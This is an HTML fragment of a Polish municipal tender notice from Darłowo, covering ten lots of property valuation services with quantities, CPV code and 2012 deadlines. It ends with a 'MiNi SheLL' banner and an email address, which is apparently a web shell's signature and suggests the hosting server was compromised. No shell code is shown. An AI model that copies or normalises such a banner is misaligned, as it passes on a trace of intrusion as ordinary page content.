<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wycena działek gruntu do opłat adiacenckich z tytułu
podziału..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 1 - wycena działek gruntu do opłat adiacenckich 
                                             z tytułu podziału.
W ramach tej części zamówienia planuje się zlecić wycenę 135 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości 
działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wycena działek gruntu do ustalenia opłaty adiacenckiej w związku  z wybudowaniem infrastruktury technicznej -określenie wartości przed  wybudowaniem i po wybudowaniu sieci wodociągowych, kanalizacyjnych, ciepłowniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 2  - wycena działek gruntu do ustalenia opłaty adiacenckiej w związku  z wybudowaniem infrastruktury technicznej -
określenie wartości przed  wybudowaniem i po wybudowaniu sieci wodociągowych, kanalizacyjnych, ciepłowniczych.
W ramach tej części zamówienia planuje się zlecić wycenę 30 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wycena działek gruntu niezabudowanych przeznaczonych pod drogi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 3   - wycena działek gruntu niezabudowanych przeznaczonych pod drogi.
W ramach tej części zamówienia planuje się zlecić wycenę 20 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wycena działek gruntu z częściami składowymi,     przeznaczonych pod drogi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 4   - wycena działek gruntu z częściami składowymi, 
                                               przeznaczonych pod drogi.
W ramach tej części zamówienia planuje się zlecić wycenę 15 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wycena działek gruntu niezabudowanych do celów innych
niż wymienione jako zadania częściowe Nr1, Nr 2, Nr 3, Nr 4 i Nr 9 ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 5 -  wycena działek gruntu niezabudowanych do celów innych niż wymienione jako zadania częściowe Nr1, Nr 2, Nr 3, Nr 4 i Nr 9 .
W ramach tej części zamówienia planuje się zlecić wycenę 110 działek gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> wycena nieruchomości zabudowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 6    - wycena nieruchomości zabudowanych.
W ramach tej części zamówienia planuje się zlecić wycenę 10 nieruchomości zabudowanych. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość nieruchomości zabudowanych jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości nieruchomości zabudowanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> wycena lokali mieszkalnych  lub użytkowych  bez lub wraz z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 7    - wycena lokali mieszkalnych  lub użytkowych  bez lub wraz z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu.
W ramach tej części zamówienia planuje się zlecić wycenę 15 lokali mieszkalnych lub użytkowych bez lub wraz z pomieszczeniami przynależnymi  i określeniem wartości ułamkowej  prawa do części  gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość lokali mieszkalnych lub użytkowych bez lub wraz 
z pomieszczeniami przynależnymi określeniem wartości ułamkowej  prawa do części  gruntu jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> wycena pomieszczeń gospodarczych przynależnych do 
lokali i określeniem wartości ułamkowej prawa do części
gruntu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 8   - wycena pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu.
W ramach tej części zamówienia planuje się zlecić wycenę 5 pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość pomieszczeń gospodarczych przynależnych do lokali i określeniem wartości ułamkowej prawa do części gruntu jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanych do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> wycena działek  gruntu celem przekształcenia prawa 
użytkowania wieczystego w prawo własności w myśl 
ustawy z dnia 29 lipca 2005 roku o przekształceniu prawa użytkowania wieczystego w prawo własności 
nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 9    - wycena działek  gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności w myśl ustawy z dnia 29 lipca 2005 roku o przekształceniu prawa użytkowania wieczystego w prawo własności 
nieruchomości.
W ramach tej części zamówienia planuje się zlecić wycenę 100 działek gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość działek gruntu celem przekształcenia prawa użytkowania wieczystego w prawo własności jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanej do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ustalanie wzrostu wartości nieruchomości, w celu
naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo w myśl art.36 ust.4 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz .U. Nr 80,  poz. 717 z dnia 10 maja 2003 r.)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE CZĘŚCIOWE NR 10 - ustalanie wzrostu wartości nieruchomości, w celu
naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo w myśl art.36 ust.4 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz .U. Nr 80,  poz. 717 z dnia 10 maja 2003 r.).
W ramach tej części zamówienia planuje się zlecić wycenę 20 nieruchomości, w celu
naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo. Zamawiający zastrzega, że wymieniona w tej części zamówienia ilość nieruchomości w celu naliczenia jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania przestrzennego miasta Darłowo  jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości przewidywanej do wyceny, gdyż wielkość ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym.
Zamawiający dopuszcza możliwość złożenia oferty częściowej pod  warunkiem, że złożona oferta oprócz tej części zamówienia obligatoryjnie będzie zawierała zobowiązanie Wykonawcy do potwierdzania wykonanych przez siebie operatów szacunkowych w okresie 12 miesięcy od daty ich sporządzenia, na podstawie zawartej na 2012 rok umowy, za cenę umowną 50% brutto za ten rodzaj wyceny  
i w terminie 7 dni od daty otrzymania zlecenia. Potwierdzanie aktualności operatów szacunkowych nie może być samodzielnym zadaniem częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com